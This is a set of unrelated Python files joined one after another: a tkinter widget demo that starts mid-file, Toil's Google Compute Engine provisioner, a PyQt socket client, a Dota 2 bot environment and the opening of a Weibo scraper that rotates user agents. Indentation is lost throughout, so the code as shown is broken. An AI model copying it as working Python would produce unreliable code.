write_thread = Thread(target=self.use_queues, args=[num], daemon=True)
write_thread.start()
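        # Hedged note: this starts two daemon threads: run_thread appends loop
        # indices to the ScrolledText widget, while write_thread blocks on
        # self.gui_queue.get() and prints whatever other code puts onto the queue.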
# Button callback
def click_me(self):
self.action.configure(text='Hello ' + self.name.get())
print(self)
# self.create_thread() # now called from imported module
bq.write_to_scrol(self)
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scrol.insert(tk.INSERT, value + '\n')
# GUI Callback
def checkCallback(self, *ignored_args):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton Callback
def radCall(self):
radSel = self.radVar.get()
if radSel == 0: self.mighty2.configure(text='Blue')
elif radSel == 1: self.mighty2.configure(text='Gold')
elif radSel == 2: self.mighty2.configure(text='Red')
# update progressbar in callback loop
def run_progressbar(self):
self.progress_bar["maximum"] = 100
for i in range(101):
sleep(0.05)
self.progress_bar["value"] = i # increment progressbar
self.progress_bar.update() # have to call update() in loop
self.progress_bar["value"] = 0 # reset/clear progressbar
def start_progressbar(self):
self.progress_bar.start()
def stop_progressbar(self):
self.progress_bar.stop()
def progressbar_stop_after(self, wait_ms=1000):
self.win.after(wait_ms, self.progress_bar.stop)
def usingGlobal(self):
global GLOBAL_CONST
GLOBAL_CONST = 777
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
#####################################################################################
def create_widgets(self):
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='Tab 1') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Tab 2') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# LabelFrame using tab1 as the parent
mighty = ttk.LabelFrame(tab1, text=' Mighty Python ')
mighty.grid(column=0, row=0, padx=8, pady=4)
# Modify adding a Label using mighty as the parent instead of win
a_label = ttk.Label(mighty, text="Enter a name:")
a_label.grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
self.name = tk.StringVar()
self.name_entered = ttk.Entry(mighty, width=24, textvariable=self.name)
self.name_entered.grid(column=0, row=1, sticky='W')
self.name_entered.delete(0, tk.END)
self.name_entered.insert(0, '< default name >')
# Adding a Button
self.action = ttk.Button(mighty, text="Click Me!", command=self.click_me)
self.action.grid(column=2, row=1)
ttk.Label(mighty, text="Choose a number:").grid(column=1, row=0)
number = tk.StringVar()
self.number_chosen = ttk.Combobox(mighty, width=14, textvariable=number, state='readonly')
self.number_chosen['values'] = (1, 2, 4, 42, 100)
self.number_chosen.grid(column=1, row=1)
self.number_chosen.current(0)
# Adding a Spinbox widget
self.spin = Spinbox(mighty, values=(1, 2, 4, 42, 100), width=5, bd=9, command=self._spin) # using range
self.spin.grid(column=0, row=2, sticky='W') # align left
# Using a scrolled Text control
scrol_w = 40; scrol_h = 10 # increase sizes
self.scrol = scrolledtext.ScrolledText(mighty, width=scrol_w, height=scrol_h, wrap=tk.WORD)
self.scrol.grid(column=0, row=3, sticky='WE', columnspan=3)
for child in mighty.winfo_children(): # add spacing to align widgets within tabs
child.grid_configure(padx=4, pady=2)
#=====================================================================================
# Tab Control 2 ----------------------------------------------------------------------
self.mighty2 = ttk.LabelFrame(tab2, text=' The Snake ')
self.mighty2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
chVarDis = tk.IntVar()
check1 = tk.Checkbutton(self.mighty2, text="Disabled", variable=chVarDis, state='disabled')
check1.select()
check1.grid(column=0, row=0, sticky=tk.W)
chVarUn = tk.IntVar()
check2 = tk.Checkbutton(self.mighty2, text="UnChecked", variable=chVarUn)
check2.deselect()
check2.grid(column=1, row=0, sticky=tk.W)
chVarEn = tk.IntVar()
check3 = tk.Checkbutton(self.mighty2, text="Enabled", variable=chVarEn)
check3.deselect()
check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# First, we change our Radiobutton global variables into a list
colors = ["Blue", "Gold", "Red"]
# create three Radiobuttons using one variable
self.radVar = tk.IntVar()
# Next we are selecting a non-existing index value for radVar
self.radVar.set(99)
# Now we are creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = tk.Radiobutton(self.mighty2, text=colors[col], variable=self.radVar,
value=col, command=self.radCall)
curRad.grid(column=col, row=1, sticky=tk.W)
# And now adding tooltips
tt.create_ToolTip(curRad, 'This is a Radiobutton control')
# Add a Progressbar to Tab 2
self.progress_bar = ttk.Progressbar(tab2, orient='horizontal', length=342, mode='determinate')
self.progress_bar.grid(column=0, row=3, pady=2)
# Create a container to hold buttons
buttons_frame = ttk.LabelFrame(self.mighty2, text=' ProgressBar ')
buttons_frame.grid(column=0, row=2, sticky='W', columnspan=2)
# Add Buttons for Progressbar commands
ttk.Button(buttons_frame, text=" Run Progressbar ", command=self.run_progressbar).grid(column=0, row=0, sticky='W')
ttk.Button(buttons_frame, text=" Start Progressbar ", command=self.start_progressbar).grid(column=0, row=1, sticky='W')
ttk.Button(buttons_frame, text=" Stop immediately ", command=self.stop_progressbar).grid(column=1, row=0, sticky='W')
ttk.Button(buttons_frame, text=" Stop after second ", command=self.progressbar_stop_after).grid(column=1, row=1, sticky='W')
for child in buttons_frame.winfo_children():
child.grid_configure(padx=2, pady=2)
for child in self.mighty2.winfo_children():
child.grid_configure(padx=8, pady=2)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrol_w - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
                msg.showinfo('Copy File to Network', 'Success: File copied.')
except FileNotFoundError as err:
msg.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
msg.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menu_bar = Menu(self.win)
self.win.config(menu=menu_bar)
# Add menu items
file_menu = Menu(menu_bar, tearoff=0)
file_menu.add_command(label="New")
file_menu.add_separator()
file_menu.add_command(label="Exit", command=self._quit)
menu_bar.add_cascade(label="File", menu=file_menu)
# Display a Message Box
def _msgBox():
msg.showinfo('Python Message Info Box', 'A Python GUI created using tkinter:\nThe year is 2017.')
# Add another Menu to the Menu Bar and an item
help_menu = Menu(menu_bar, tearoff=0)
help_menu.add_command(label="About", command=_msgBox) # display messagebox when clicked
menu_bar.add_cascade(label="Help", menu=help_menu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# It is not necessary to create a tk.StringVar()
# strData = tk.StringVar()
strData = self.spin.get()
# call function
self.usingGlobal()
# self.name_entered.focus()
# Set focus to Tab 2
tabControl.select(1)
# Add Tooltips -----------------------------------------------------
# Add a Tooltip to the Spinbox
tt.create_ToolTip(self.spin, 'This is a Spinbox control')
# Add Tooltips to more widgets
tt.create_ToolTip(self.name_entered, 'This is an Entry control')
tt.create_ToolTip(self.action, 'This is a Button control')
tt.create_ToolTip(self.scrol, 'This is a ScrolledText control')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
|
gceProvisioner.py
|
# Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import threading
import time
import uuid
from typing import Optional, Set
import requests
from libcloud.compute.drivers.gce import GCEFailedNode
from libcloud.compute.providers import get_driver
from libcloud.compute.types import Provider
from toil.jobStores.googleJobStore import GoogleJobStore
from toil.provisioners import NoSuchClusterException
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.node import Node
logger = logging.getLogger(__name__)
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
class GCEProvisioner(AbstractProvisioner):
"""
Implements a Google Compute Engine Provisioner using libcloud.
"""
NODE_BOTO_PATH = "/root/.boto" # boto file path on instances
SOURCE_IMAGE = (b'projects/flatcar-cloud/global/images/family/flatcar-stable')
def __init__(self, clusterName, clusterType, zone, nodeStorage, nodeStorageOverrides, sseKey):
self.cloud = 'gce'
self._sseKey = sseKey
# Call base class constructor, which will call createClusterSettings()
# or readClusterSettings()
super(GCEProvisioner, self).__init__(clusterName, clusterType, zone, nodeStorage, nodeStorageOverrides)
def supportedClusterTypes(self):
return {'mesos'}
def createClusterSettings(self):
# All we need to do is read the Google credentials we need to provision
# things
self._readCredentials()
def readClusterSettings(self):
"""
Read the cluster settings from the instance, which should be the leader.
See https://cloud.google.com/compute/docs/storing-retrieving-metadata for details about
reading the metadata.
"""
metadata_server = "http://metadata/computeMetadata/v1/instance/"
metadata_flavor = {'Metadata-Flavor': 'Google'}
zone = requests.get(metadata_server + 'zone', headers = metadata_flavor).text
self._zone = zone.split('/')[-1]
project_metadata_server = "http://metadata/computeMetadata/v1/project/"
self._projectId = requests.get(project_metadata_server + 'project-id', headers = metadata_flavor).text
# From a GCE instance, these values can be blank. Only the projectId is needed
self._googleJson = ''
self._clientEmail = ''
self._tags = requests.get(metadata_server + 'description', headers = metadata_flavor).text
tags = json.loads(self._tags)
self.clusterName = tags['clusterName']
self._gceDriver = self._getDriver()
self._instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
leader = self.getLeader()
self._leaderPrivateIP = leader.privateIP
# The location of the Google credentials file on instances.
self._credentialsPath = GoogleJobStore.nodeServiceAccountJson
self._keyName = 'core' # key name the leader uses to communicate with workers
self._botoPath = self.NODE_BOTO_PATH # boto credentials (used if reading an AWS bucket)
# Let the base provisioner work out how to deploy duly authorized
# workers for this leader.
self._setLeaderWorkerAuthentication()
def _readCredentials(self):
"""
Get the credentials from the file specified by GOOGLE_APPLICATION_CREDENTIALS.
"""
self._googleJson = os.getenv('GOOGLE_APPLICATION_CREDENTIALS')
if not self._googleJson:
raise RuntimeError('GOOGLE_APPLICATION_CREDENTIALS not set.')
try:
with open(self._googleJson) as jsonFile:
self.googleConnectionParams = json.loads(jsonFile.read())
except Exception:
raise RuntimeError('GCEProvisioner: Could not parse the Google service account json file %s'
% self._googleJson)
self._projectId = self.googleConnectionParams['project_id']
self._clientEmail = self.googleConnectionParams['client_email']
self._credentialsPath = self._googleJson
self._clearLeaderWorkerAuthentication() # TODO: Why are we doing this?
self._gceDriver = self._getDriver()
def launchCluster(self, leaderNodeType, leaderStorage, owner, **kwargs):
"""
In addition to the parameters inherited from the abstractProvisioner,
the Google launchCluster takes the following parameters:
keyName: The key used to communicate with instances
botoPath: Boto credentials for reading an AWS jobStore (optional).
vpcSubnet: A subnet (optional).
"""
if 'keyName' not in kwargs:
raise RuntimeError("A keyPairName is required for the GCE provisioner.")
self._keyName = kwargs['keyName']
if 'botoPath' in kwargs:
self._botoPath = kwargs['botoPath']
self._vpcSubnet = kwargs['vpcSubnet'] if 'vpcSubnet' in kwargs else None
# Throws an error if cluster exists
self._instanceGroup = self._gceDriver.ex_create_instancegroup(self.clusterName, self._zone)
logger.debug('Launching leader')
# GCE doesn't have a dictionary tags field. The tags field is just a string list.
# Therefore, dumping tags into the description.
tags = {'Owner': self._keyName, 'clusterName': self.clusterName}
if 'userTags' in kwargs:
tags.update(kwargs['userTags'])
self._tags = json.dumps(tags)
metadata = {'items': [{'key': 'user-data', 'value': self._getCloudConfigUserData('leader')}]}
imageType = 'flatcar-stable'
sa_scopes = [{'scopes': ['compute', 'storage-full']}]
disk = {}
disk['initializeParams'] = {
'sourceImage': self.SOURCE_IMAGE,
'diskSizeGb' : leaderStorage }
disk.update({'boot': True,
'autoDelete': True })
name = 'l' + str(uuid.uuid4())
leader = self._gceDriver.create_node(
name,
leaderNodeType,
imageType,
location=self._zone,
ex_service_accounts=sa_scopes,
ex_metadata=metadata,
ex_subnetwork=self._vpcSubnet,
ex_disks_gce_struct = [disk],
description=self._tags,
ex_preemptible=False
)
self._instanceGroup.add_instances([leader])
self._leaderPrivateIP = leader.private_ips[0] # needed if adding workers
#self.subnetID = leader.subnet_id #TODO: get subnetID
# Wait for the appliance to start and inject credentials.
leaderNode = Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
preemptable=False, tags=self._tags)
leaderNode.waitForNode('toil_leader', keyName=self._keyName)
leaderNode.copySshKeys(self._keyName)
leaderNode.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_leader')
if self._botoPath:
leaderNode.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_leader')
# Download credentials
self._setLeaderWorkerAuthentication(leaderNode)
logger.debug('Launched leader')
def getNodeShape(self, instance_type: str, preemptable=False):
# TODO: read this value only once
sizes = self._gceDriver.list_sizes(location=self._zone)
sizes = [x for x in sizes if x.name == instance_type]
assert len(sizes) == 1
instanceType = sizes[0]
disk = 0 #instanceType.disks * instanceType.disk_capacity * 2 ** 30
if disk == 0:
# This is an EBS-backed instance. We will use the root
# volume, so add the amount of EBS storage requested for the root volume
disk = self._nodeStorageOverrides.get(instance_type, self._nodeStorage) * 2 ** 30
# Ram is in M.
#Underestimate memory by 100M to prevent autoscaler from disagreeing with
#mesos about whether a job can run on a particular node type
memory = (instanceType.ram/1000 - 0.1) * 2** 30
return Shape(wallTime=60 * 60,
memory=memory,
cores=instanceType.extra['guestCpus'],
disk=disk,
preemptable=preemptable)
@staticmethod
def retryPredicate(e):
""" Not used by GCE """
return False
def destroyCluster(self):
"""
Try a few times to terminate all of the instances in the group.
"""
logger.debug("Destroying cluster %s" % self.clusterName)
instancesToTerminate = self._getNodesInCluster()
attempts = 0
while instancesToTerminate and attempts < 3:
self._terminateInstances(instances=instancesToTerminate)
instancesToTerminate = self._getNodesInCluster()
attempts += 1
# remove group
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instanceGroup.destroy()
def terminateNodes(self, nodes):
nodeNames = [n.name for n in nodes]
instances = self._getNodesInCluster()
instancesToKill = [i for i in instances if i.name in nodeNames]
self._terminateInstances(instancesToKill)
def addNodes(self, nodeTypes: Set[str], numNodes, preemptable, spotBid=None):
assert self._leaderPrivateIP
# We don't support any balancing here so just pick one of the
# equivalent node types
node_type = next(iter(nodeTypes))
# If keys are rsynced, then the mesos-slave needs to be started after the keys have been
# transferred. The waitForKey.sh script loops on the new VM until it finds the keyPath file, then it starts the
# mesos-slave. If there are multiple keys to be transferred, then the last one to be transferred must be
# set to keyPath.
keyPath = None
botoExists = False
if self._botoPath is not None and os.path.exists(self._botoPath):
keyPath = self.NODE_BOTO_PATH
botoExists = True
elif self._sseKey:
keyPath = self._sseKey
if not preemptable:
logger.debug('Launching %s non-preemptable nodes', numNodes)
else:
logger.debug('Launching %s preemptable nodes', numNodes)
#kwargs["subnet_id"] = self.subnetID if self.subnetID else self._getClusterInstance(self.instanceMetaData).subnet_id
userData = self._getCloudConfigUserData('worker', keyPath, preemptable)
metadata = {'items': [{'key': 'user-data', 'value': userData}]}
imageType = 'flatcar-stable'
sa_scopes = [{'scopes': ['compute', 'storage-full']}]
disk = {}
disk['initializeParams'] = {
'sourceImage': self.SOURCE_IMAGE,
'diskSizeGb' : self._nodeStorageOverrides.get(node_type, self._nodeStorage) }
disk.update({'boot': True,
'autoDelete': True })
# TODO:
# - bug in gce.py for ex_create_multiple_nodes (erroneously, doesn't allow image and disk to be specified)
# - ex_create_multiple_nodes is limited to 1000 nodes
# - use a different function
# - or write a loop over the rest of this function, with 1K nodes max on each iteration
retries = 0
workersCreated = 0
# Try a few times to create the requested number of workers
while numNodes-workersCreated > 0 and retries < 3:
instancesLaunched = self.ex_create_multiple_nodes(
'', node_type, imageType, numNodes-workersCreated,
location=self._zone,
ex_service_accounts=sa_scopes,
ex_metadata=metadata,
ex_disks_gce_struct = [disk],
description=self._tags,
ex_preemptible = preemptable
)
failedWorkers = []
for instance in instancesLaunched:
if isinstance(instance, GCEFailedNode):
logger.error("Worker failed to launch with code %s. Error message: %s"
% (instance.code, instance.error))
continue
node = Node(publicIP=instance.public_ips[0], privateIP=instance.private_ips[0],
name=instance.name, launchTime=instance.created_at, nodeType=instance.size,
preemptable=False, tags=self._tags) #FIXME: what should tags be set to?
try:
self._injectWorkerFiles(node, botoExists)
logger.debug("Created worker %s" % node.publicIP)
self._instanceGroup.add_instances([instance])
workersCreated += 1
except Exception as e:
logger.error("Failed to configure worker %s. Error message: %s" % (node.name, e))
failedWorkers.append(instance)
if failedWorkers:
logger.error("Terminating %d failed workers" % len(failedWorkers))
self._terminateInstances(failedWorkers)
retries += 1
logger.debug('Launched %d new instance(s)', numNodes)
if numNodes != workersCreated:
logger.error("Failed to launch %d worker(s)", numNodes-workersCreated)
return workersCreated
def getProvisionedWorkers(self, instance_type: Optional[str] = None, preemptable: Optional[bool] = None):
assert self._leaderPrivateIP
entireCluster = self._getNodesInCluster(instance_type=instance_type)
logger.debug('All nodes in cluster: %s', entireCluster)
workerInstances = []
for instance in entireCluster:
if preemptable is not None:
scheduling = instance.extra.get('scheduling')
# If this field is not found in the extra meta-data, assume the node is not preemptable.
if scheduling and scheduling.get('preemptible', False) != preemptable:
continue
isWorker = True
for ip in instance.private_ips:
if ip == self._leaderPrivateIP:
isWorker = False
break # don't include the leader
if isWorker and instance.state == 'running':
workerInstances.append(instance)
logger.debug('All workers found in cluster: %s', workerInstances)
return [Node(publicIP=i.public_ips[0], privateIP=i.private_ips[0],
name=i.name, launchTime=i.created_at, nodeType=i.size,
preemptable=i.extra.get('scheduling', {}).get('preemptible', False), tags=None)
for i in workerInstances]
def getLeader(self):
instances = self._getNodesInCluster()
instances.sort(key=lambda x: x.created_at)
try:
leader = instances[0] # assume leader was launched first
except IndexError:
raise NoSuchClusterException(self.clusterName)
return Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
preemptable=False, tags=None)
def _injectWorkerFiles(self, node, botoExists):
"""
Set up the credentials on the worker.
"""
node.waitForNode('toil_worker', keyName=self._keyName)
node.copySshKeys(self._keyName)
node.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_worker')
if self._sseKey:
node.injectFile(self._sseKey, self._sseKey, 'toil_worker')
if botoExists:
node.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_worker')
def _getNodesInCluster(self, instance_type: Optional[str] = None):
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instances = instanceGroup.list_instances()
if instance_type:
instances = [instance for instance in instances if instance.size == instance_type]
return instances
def _getDriver(self):
""" Connect to GCE """
driverCls = get_driver(Provider.GCE)
return driverCls(self._clientEmail,
self._googleJson,
project=self._projectId,
datacenter=self._zone)
def _terminateInstances(self, instances):
def worker(driver, instance):
logger.debug('Terminating instance: %s', instance.name)
driver.destroy_node(instance)
threads = []
for instance in instances:
t = threading.Thread(target=worker, args=(self._gceDriver,instance))
threads.append(t)
t.start()
logger.debug('... Waiting for instance(s) to shut down...')
for t in threads:
t.join()
# MONKEY PATCH - This function was copied from libcloud to fix a bug.
DEFAULT_TASK_COMPLETION_TIMEOUT = 180
def ex_create_multiple_nodes(
self, base_name, size, image, number, location=None,
ex_network='default', ex_subnetwork=None, ex_tags=None,
ex_metadata=None, ignore_errors=True, use_existing_disk=True,
poll_interval=2, external_ip='ephemeral',
ex_disk_type='pd-standard', ex_disk_auto_delete=True,
ex_service_accounts=None, timeout=DEFAULT_TASK_COMPLETION_TIMEOUT,
description=None, ex_can_ip_forward=None, ex_disks_gce_struct=None,
ex_nic_gce_struct=None, ex_on_host_maintenance=None,
ex_automatic_restart=None, ex_image_family=None,
ex_preemptible=None):
"""
Monkey patch to gce.py in libcloud to allow disk and images to be specified.
Also changed name to a uuid below.
The prefix 'wp' identifies preemptable nodes and 'wn' non-preemptable nodes.
"""
# if image and ex_disks_gce_struct:
# raise ValueError("Cannot specify both 'image' and "
# "'ex_disks_gce_struct'.")
driver = self._getDriver()
if image and ex_image_family:
raise ValueError("Cannot specify both 'image' and "
"'ex_image_family'")
location = location or driver.zone
if not hasattr(location, 'name'):
location = driver.ex_get_zone(location)
if not hasattr(size, 'name'):
size = driver.ex_get_size(size, location)
if not hasattr(ex_network, 'name'):
ex_network = driver.ex_get_network(ex_network)
if ex_subnetwork and not hasattr(ex_subnetwork, 'name'):
ex_subnetwork = \
driver.ex_get_subnetwork(ex_subnetwork,
region=driver._get_region_from_zone(
location))
if ex_image_family:
image = driver.ex_get_image_from_family(ex_image_family)
if image and not hasattr(image, 'name'):
image = driver.ex_get_image(image)
if not hasattr(ex_disk_type, 'name'):
ex_disk_type = driver.ex_get_disktype(ex_disk_type, zone=location)
node_attrs = {'size': size,
'image': image,
'location': location,
'network': ex_network,
'subnetwork': ex_subnetwork,
'tags': ex_tags,
'metadata': ex_metadata,
'ignore_errors': ignore_errors,
'use_existing_disk': use_existing_disk,
'external_ip': external_ip,
'ex_disk_type': ex_disk_type,
'ex_disk_auto_delete': ex_disk_auto_delete,
'ex_service_accounts': ex_service_accounts,
'description': description,
'ex_can_ip_forward': ex_can_ip_forward,
'ex_disks_gce_struct': ex_disks_gce_struct,
'ex_nic_gce_struct': ex_nic_gce_struct,
'ex_on_host_maintenance': ex_on_host_maintenance,
'ex_automatic_restart': ex_automatic_restart,
'ex_preemptible': ex_preemptible}
# List for holding the status information for disk/node creation.
status_list = []
for i in range(number):
name = 'wp' if ex_preemptible else 'wn'
name += str(uuid.uuid4()) #'%s-%03d' % (base_name, i)
status = {'name': name, 'node_response': None, 'node': None}
status_list.append(status)
start_time = time.time()
complete = False
while not complete:
if (time.time() - start_time >= timeout):
raise Exception("Timeout (%s sec) while waiting for multiple "
"instances")
complete = True
time.sleep(poll_interval)
for status in status_list:
# Create the node or check status if already in progress.
if not status['node']:
if not status['node_response']:
driver._multi_create_node(status, node_attrs)
else:
driver._multi_check_node(status, node_attrs)
# If any of the nodes have not been created (or failed) we are
# not done yet.
if not status['node']:
complete = False
# Return list of nodes
node_list = []
for status in status_list:
node_list.append(status['node'])
return node_list
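# Illustrative usage sketch (not part of the original module). The cluster
# name, zone, storage sizes and machine type below are placeholder values
# chosen for the example, not defaults of this provisioner:
#
#     provisioner = GCEProvisioner(clusterName='example-cluster',
#                                  clusterType='mesos',
#                                  zone='us-west1-a',
#                                  nodeStorage=50,
#                                  nodeStorageOverrides={},
#                                  sseKey=None)
#     # launchCluster() requires a keyName (see the RuntimeError above).
#     provisioner.launchCluster(leaderNodeType='n1-standard-2',
#                               leaderStorage=50,
#                               owner='example-owner',
#                               keyName='core')
#     # Add two non-preemptable workers of a single node type.
#     provisioner.addNodes(nodeTypes={'n1-standard-2'}, numNodes=2,
#                          preemptable=False)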
|
test.py
|
from simple import *
from PyQt5.QtWidgets import QApplication, QMainWindow
from multiprocessing import Process
import socket
import threading
lock = threading.RLock()
HOST = "192.168.2.5"
PORT = 65432
content = 'hello'
class ReadFromConnThread(threading.Thread):
def __init__(self, conn):
super().__init__()
self.conn = conn
def run(self):
try:
while True:
contents = self.conn.recv(1024)
print(f"\n({HOST}:{PORT}): {contents.decode('utf-8')}\n", end="")
except Exception:
pass
def socket_start():
global content
print(str(id(content))+"--1")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
read_thread = ReadFromConnThread(s)
read_thread.daemon = True
read_thread.start()
while True:
print(str(id(content))+"--2")
for i in range(1000000000):
a=0
while content == "wuhu":
s.sendall(content.encode("utf-8"))
lock.acquire()
content = 'pass'
lock.release()
s.close()
flag_lr = False # left is False right is True
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
# Import the UI class defined from the .ui file
self.ui = Ui_MainWindow()
# Initialize the UI
self.ui.setupUi(self)
def mouseMoveEvent(self, event):
global flag_lr
global content
print(str(id(content))+ "--3")
s = event.windowPos()
self.setMouseTracking(True)
self.ui.label.setText('X:' + str(s.x()))
self.ui.label_2.setText('Y:' + str(s.y()))
if s.x() > 300 and not flag_lr:
print("fire")
lock.acquire()
content = 'wuhu'
print(str(id(content))+"--4")
lock.release()
flag_lr = True
elif s.x() >= 300:
lock.acquire()
content = 'wuhu'
lock.release()
pass
elif s.x() <= 100:
lock.acquire()
content = 'pass'
lock.release()
flag_lr = False
def window_start():
app = QApplication([])
mainw = MainWindow()
mainw.show()
app.exec_()
if __name__ == '__main__':
#global content
t2 = Process(target=window_start)
t1 = Process(target=socket_start)
t2.start()
t1.start()
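# Illustrative sketch (not part of the original program): a minimal TCP
# server this client could be pointed at for local testing. The bind
# address below is a placeholder; the client above connects to HOST:PORT.
#
#     import socket
#
#     def echo_server(host="127.0.0.1", port=65432):
#         with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
#             srv.bind((host, port))
#             srv.listen(1)
#             conn, _ = srv.accept()
#             with conn:
#                 while True:
#                     data = conn.recv(1024)
#                     if not data:
#                         break
#                     conn.sendall(data)  # echo the payload back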
|
Dota2Env.py
|
import sys
from threading import Thread
from time import sleep
import numpy as np
from dota2comm import Dota2Comm
import queue
ActionMap = {
"laning": np.asarray([1, 0, 0]),
"attack": np.asarray([0, 1, 0]),
"retreat": np.asarray([0, 0, 1]),
}
# Helper function
def ParseLine(ll):
ll = ll.split(" ")
return np.asarray([float(s) for s in ll[1:24]]),float(ll[24]),ActionMap[ll[25]]
class Dota2Env():
def __init__(self, name):
self.name = name
self.dota = Dota2Comm(name)
self.StateQueue = queue.Queue()
self.OrderQueue = queue.Queue()
self.StartThreads()
def WaitDota2Msg(self):
while self.running:
msg = self.dota.receiveMessage()
if msg is not None:
self.StateQueue.put(msg)
def SendDota2Msg(self):
while self.running:
order = self.OrderQueue.get()
msg = str(np.argmax(order[0]))
self.dota.sendMessage(msg)
def StartThreads(self):
self.running = True
self.threadrecv = Thread(target=self.WaitDota2Msg)
self.threadrecv.start()
self.threadsend = Thread(target=self.SendDota2Msg)
self.threadsend.start()
def GiveOrder(self,order):
self.OrderQueue.put(order)
def GetStateRewardAction(self):
origin_str = self.StateQueue.get()
return ParseLine(origin_str)
def Step(self, order):
self.GiveOrder(order)
return self.GetStateRewardAction()
def Stop(self):
self.running = False
self.threadrecv.join()
self.threadsend.join()
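# Illustrative usage sketch (not part of the original module). The env name
# is a placeholder; the order is wrapped in a list because SendDota2Msg
# reads order[0] before taking the argmax.
#
#     env = Dota2Env("example_bot")
#     try:
#         state, reward, action = env.Step([ActionMap["attack"]])
#     finally:
#         env.Stop()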
|
search_by_db.py
|
from fake_useragent import UserAgent
import requests
from time import sleep
import datetime
from .model import WeiboInfo, WeiboTask, engine
from sqlalchemy.orm import sessionmaker
from pyquery import PyQuery as pq
import random
Session = sessionmaker(bind=engine)
session = Session()
ua = UserAgent(verify_ssl=False)
cookies = ""
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Language': 'zh-cn',
'Cookie': cookies,
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'}
import queue
import threading
class Weibo():
def __init__(self):
self.urlqueue = queue.Queue()
self.sec_urlqueue = queue.Queue()
self.canshu_queue = queue.Queue()
Session = sessionmaker(bind=engine)
self.session = Session()
def get_data(self,url):
sleep(1.5)
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Cookie': cookies,
'User-Agent': ua.random}
# , proxies = proxy
print(url)
data = requests.get(url, headers=headers).text
# print(data)
return data
def parse_html(self,pl_feedlist_index, begintime,pageurl):
canshu_list=[]
for i in pl_feedlist_index.find('.card-wrap').items():
canshu = {}
card_feed = (i.find('.card-feed'))
content = card_feed.find('.content')
name = content.find('.name').text()
name_link = content.find('.name').attr('href')
txt = content.find('.txt').text()
